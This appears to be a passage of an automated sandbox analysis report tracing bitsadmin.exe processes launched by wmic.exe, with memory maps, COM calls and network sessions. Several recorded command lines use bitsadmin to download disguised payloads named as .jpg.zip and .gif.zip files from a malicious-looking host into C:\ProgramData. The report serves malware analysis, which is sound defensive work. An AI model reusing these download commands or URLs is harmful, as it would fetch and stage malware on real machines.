private_0x0000000000650000	0x00650000	0x0068ffff	Private Memory	rw	-
private_0x00000000006b0000	0x006b0000	0x006effff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x0081ffff	Private Memory	rw	-
sortdefault.nls	0x00820000	0x00aeefff	Memory Mapped File	r	-
bitsadmin.exe	0x00cf0000	0x00d33fff	Memory Mapped File	rwx	-
pagefile_0x0000000000d40000	0x00d40000	0x0193ffff	Pagefile Backed Memory	r	-
qmgrprxy.dll	0x6f8b0000	0x6f8b8fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
rsaenh.dll	0x748e0000	0x7491afff	Memory Mapped File	rwx	-
cryptsp.dll	0x74b40000	0x74b55fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fc0000	0x74fcbfff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x75060000	0x7506dfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shell32.dll	0x75c70000	0x768b9fff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
clbcatq.dll	0x770c0000	0x77142fff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	rw	-
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	rw	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

COM (4)

»

Operation	Class	Interface	Additional Information	Count	Logfile
Create	BackgroundCopyManager	IBackgroundCopyManager	cls_context = CLSCTX_LOCAL_SERVER	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyManager	method_name = CreateJob, display_name = msd5, new_interface = IBackgroundCopyJob	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = SetPriority, priority = BG_JOB_PRIORITY_FOREGROUND	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = AddFile, url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhma.jpg.zip?18841737, filename = C:\ProgramData\tempa\marxvxinhhma.jpg	1	Fn

File (74)

»

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Open	STD_INPUT_HANDLE	-	5	Fn
Write	STD_OUTPUT_HANDLE	size = 2	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 36	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 30	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 41	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 94	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 88	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 10	12	Fn Data
Write	STD_OUTPUT_HANDLE	size = 5	8	Fn Data
Write	STD_OUTPUT_HANDLE	size = 7	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 8	18	Fn Data
Write	STD_OUTPUT_HANDLE	size = 12	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 13	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 15	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 17	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 14	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 22	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 11	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 16	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 9	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 20	1	Fn Data

Module (5)

»

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\bitsadmin.exe	base_address = 0xcf0000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapSetInformation, address_out = 0x753c4157	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn

System (11)

»

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	4	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:26:48 (UTC)	1	Fn
Get Time	type = Ticks, time = 119215	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:26:50 (UTC)	3	Fn
Get Time	type = System Time, time = 2018-10-22 05:26:51 (UTC)	1	Fn

Network Behavior

HTTP Sessions (1)

»

Information	Value
Total Data Sent	395 bytes
Total Data Received	0 bytes
Contacted Host Count	1
Contacted Hosts	xbr6lge984320911.notafiscal05.com

HTTP Session #1

»

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)
Server Name	xbr6lge984320911.notafiscal05.com
Server Port	80
Data Sent	395
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = xbr6lge984320911.notafiscal05.com, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /04/marxvxinhhma.jpg.zip	1	Fn
Send HTTP Request	url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhma.jpg.zip?18841737	1	Fn

Process #8: bitsadmin.exe

89

4

»

Information	Value
ID	#8
File Name	c:\windows\system32\bitsadmin.exe
Command Line	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmb.jpg.zip?607484307 C:\ProgramData\tempa\marxvxinhhmb.jpg
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:03, Reason: Child Process
Unmonitor	End Time: 00:01:04, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

»

Information	Value
PID	0xb74
Parent PID	0xa98 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x B78 0x B8C 0x B90 0x B94 0x B98

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x00187fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000190000	0x00190000	0x00196fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001a0000	0x001a0000	0x001a1fff	Pagefile Backed Memory	rw	-
bitsadmin.exe.mui	0x001b0000	0x001b0fff	Memory Mapped File	rw	-
private_0x00000000001c0000	0x001c0000	0x001c0fff	Private Memory	rw	-
private_0x00000000001d0000	0x001d0000	0x0020ffff	Private Memory	rw	-
pagefile_0x0000000000210000	0x00210000	0x00310fff	Pagefile Backed Memory	r	-
private_0x0000000000320000	0x00320000	0x00320fff	Private Memory	rw	-
pagefile_0x0000000000330000	0x00330000	0x00330fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000340000	0x00340000	0x00340fff	Pagefile Backed Memory	r	-
private_0x0000000000350000	0x00350000	0x0044ffff	Private Memory	rw	-
rpcss.dll	0x00450000	0x004abfff	Memory Mapped File	r	-
private_0x0000000000450000	0x00450000	0x004fffff	Private Memory	rw	-
rsaenh.dll	0x00450000	0x0048bfff	Memory Mapped File	r	-
private_0x00000000004c0000	0x004c0000	0x004fffff	Private Memory	rw	-
private_0x0000000000590000	0x00590000	0x0059ffff	Private Memory	rw	-
pagefile_0x00000000005a0000	0x005a0000	0x0067efff	Pagefile Backed Memory	r	-
private_0x0000000000680000	0x00680000	0x006bffff	Private Memory	rw	-
private_0x0000000000720000	0x00720000	0x0075ffff	Private Memory	rw	-
private_0x00000000007a0000	0x007a0000	0x007dffff	Private Memory	rw	-
sortdefault.nls	0x007e0000	0x00aaefff	Memory Mapped File	r	-
private_0x0000000000b30000	0x00b30000	0x00b6ffff	Private Memory	rw	-
bitsadmin.exe	0x00ee0000	0x00f23fff	Memory Mapped File	rwx	-
pagefile_0x0000000000f30000	0x00f30000	0x01b2ffff	Pagefile Backed Memory	r	-
qmgrprxy.dll	0x6f8b0000	0x6f8b8fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
rsaenh.dll	0x748e0000	0x7491afff	Memory Mapped File	rwx	-
cryptsp.dll	0x74b40000	0x74b55fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fc0000	0x74fcbfff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x75060000	0x7506dfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shell32.dll	0x75c70000	0x768b9fff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
clbcatq.dll	0x770c0000	0x77142fff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd6000	0x7ffd6000	0x7ffd6fff	Private Memory	rw	-
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	rw	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

COM (4)

»

Operation	Class	Interface	Additional Information	Count	Logfile
Create	BackgroundCopyManager	IBackgroundCopyManager	cls_context = CLSCTX_LOCAL_SERVER	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyManager	method_name = CreateJob, display_name = msd5, new_interface = IBackgroundCopyJob	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = SetPriority, priority = BG_JOB_PRIORITY_FOREGROUND	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = AddFile, url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmb.jpg.zip?607484307, filename = C:\ProgramData\tempa\marxvxinhhmb.jpg	1	Fn

File (72)

»

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Open	STD_INPUT_HANDLE	-	5	Fn
Write	STD_OUTPUT_HANDLE	size = 2	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 36	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 30	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 41	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 94	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 88	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 10	12	Fn Data
Write	STD_OUTPUT_HANDLE	size = 5	8	Fn Data
Write	STD_OUTPUT_HANDLE	size = 7	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 8	19	Fn Data
Write	STD_OUTPUT_HANDLE	size = 12	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 13	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 15	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 17	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 22	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 20	1	Fn Data

Module (5)

»

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\bitsadmin.exe	base_address = 0xee0000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapSetInformation, address_out = 0x753c4157	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	3	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:26:51 (UTC)	5	Fn
Get Time	type = Ticks, time = 122055	1	Fn

Network Behavior

HTTP Sessions (1)

»

Information	Value
Total Data Sent	396 bytes
Total Data Received	0 bytes
Contacted Host Count	1
Contacted Hosts	xbr6lge984320911.notafiscal05.com

HTTP Session #1

»

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)
Server Name	xbr6lge984320911.notafiscal05.com
Server Port	80
Data Sent	396
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = xbr6lge984320911.notafiscal05.com, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /04/marxvxinhhmb.jpg.zip	1	Fn
Send HTTP Request	url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmb.jpg.zip?607484307	1	Fn

Process #9: bitsadmin.exe

89

4

»

Information	Value
ID	#9
File Name	c:\windows\system32\bitsadmin.exe
Command Line	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmc.jpg.zip?105185218 C:\ProgramData\tempa\marxvxinhhmc.jpg
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:04, Reason: Child Process
Unmonitor	End Time: 00:01:06, Reason: Self Terminated
Monitor Duration	00:00:02

OS Process Information

»

Information	Value
PID	0xba8
Parent PID	0xa98 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x BAC 0x BC0 0x BC4 0x BC8 0x BCC

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x00187fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000190000	0x00190000	0x00196fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001a0000	0x001a0000	0x001a1fff	Pagefile Backed Memory	rw	-
private_0x00000000001b0000	0x001b0000	0x001effff	Private Memory	rw	-
pagefile_0x00000000001f0000	0x001f0000	0x002f0fff	Pagefile Backed Memory	r	-
bitsadmin.exe.mui	0x00300000	0x00300fff	Memory Mapped File	rw	-
private_0x0000000000310000	0x00310000	0x00310fff	Private Memory	rw	-
private_0x0000000000320000	0x00320000	0x00320fff	Private Memory	rw	-
pagefile_0x0000000000330000	0x00330000	0x00330fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000340000	0x00340000	0x00340fff	Pagefile Backed Memory	r	-
private_0x0000000000350000	0x00350000	0x0035ffff	Private Memory	rw	-
rpcss.dll	0x00360000	0x003bbfff	Memory Mapped File	r	-
rsaenh.dll	0x00360000	0x0039bfff	Memory Mapped File	r	-
private_0x00000000003a0000	0x003a0000	0x003dffff	Private Memory	rw	-
bitsadmin.exe	0x00400000	0x00443fff	Memory Mapped File	rwx	-
private_0x0000000000450000	0x00450000	0x0056ffff	Private Memory	rw	-
pagefile_0x0000000000450000	0x00450000	0x0052efff	Pagefile Backed Memory	r	-
private_0x0000000000530000	0x00530000	0x0056ffff	Private Memory	rw	-
private_0x00000000005d0000	0x005d0000	0x006cffff	Private Memory	rw	-
pagefile_0x00000000006d0000	0x006d0000	0x012cffff	Pagefile Backed Memory	r	-
private_0x00000000013b0000	0x013b0000	0x013effff	Private Memory	rw	-
sortdefault.nls	0x013f0000	0x016befff	Memory Mapped File	r	-
private_0x0000000001750000	0x01750000	0x0178ffff	Private Memory	rw	-
private_0x00000000017a0000	0x017a0000	0x017dffff	Private Memory	rw	-
qmgrprxy.dll	0x6f8b0000	0x6f8b8fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
rsaenh.dll	0x748e0000	0x7491afff	Memory Mapped File	rwx	-
cryptsp.dll	0x74b40000	0x74b55fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fc0000	0x74fcbfff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x75060000	0x7506dfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shell32.dll	0x75c70000	0x768b9fff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
clbcatq.dll	0x770c0000	0x77142fff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	rw	-
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	rw	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

COM (4)

»

Operation	Class	Interface	Additional Information	Count	Logfile
Create	BackgroundCopyManager	IBackgroundCopyManager	cls_context = CLSCTX_LOCAL_SERVER	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyManager	method_name = CreateJob, display_name = msd5, new_interface = IBackgroundCopyJob	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = SetPriority, priority = BG_JOB_PRIORITY_FOREGROUND	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = AddFile, url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmc.jpg.zip?105185218, filename = C:\ProgramData\tempa\marxvxinhhmc.jpg	1	Fn

File (72)

»

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Open	STD_INPUT_HANDLE	-	5	Fn
Write	STD_OUTPUT_HANDLE	size = 2	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 36	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 30	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 41	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 94	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 88	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 10	12	Fn Data
Write	STD_OUTPUT_HANDLE	size = 5	8	Fn Data
Write	STD_OUTPUT_HANDLE	size = 7	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 8	19	Fn Data
Write	STD_OUTPUT_HANDLE	size = 12	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 13	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 15	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 17	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 22	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 20	1	Fn Data

Module (5)

»

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\bitsadmin.exe	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapSetInformation, address_out = 0x753c4157	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	3	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:26:52 (UTC)	5	Fn
Get Time	type = Ticks, time = 122991	1	Fn

Network Behavior

HTTP Sessions (1)

»

Information	Value
Total Data Sent	396 bytes
Total Data Received	0 bytes
Contacted Host Count	1
Contacted Hosts	xbr6lge984320911.notafiscal05.com

HTTP Session #1

»

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)
Server Name	xbr6lge984320911.notafiscal05.com
Server Port	80
Data Sent	396
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = xbr6lge984320911.notafiscal05.com, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /04/marxvxinhhmc.jpg.zip	1	Fn
Send HTTP Request	url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmc.jpg.zip?105185218	1	Fn

Process #10: bitsadmin.exe

110

4

»

Information	Value
ID	#10
File Name	c:\windows\system32\bitsadmin.exe
Command Line	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmdwwn.gif.zip?918109560 C:\ProgramData\tempa\marxvxinhhmdwwn.gif
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:04, Reason: Child Process
Unmonitor	End Time: 00:01:07, Reason: Self Terminated
Monitor Duration	00:00:03

OS Process Information

»

Information	Value
PID	0xbd8
Parent PID	0xa98 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x BDC 0x BF0 0x BF4 0x BF8 0x BFC

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	rw	-
bitsadmin.exe.mui	0x000e0000	0x000e0fff	Memory Mapped File	rw	-
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	rw	-
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	rw	-
pagefile_0x0000000000110000	0x00110000	0x00110fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000120000	0x00120000	0x00120fff	Pagefile Backed Memory	r	-
private_0x0000000000130000	0x00130000	0x0016ffff	Private Memory	rw	-
rpcss.dll	0x00170000	0x001cbfff	Memory Mapped File	r	-
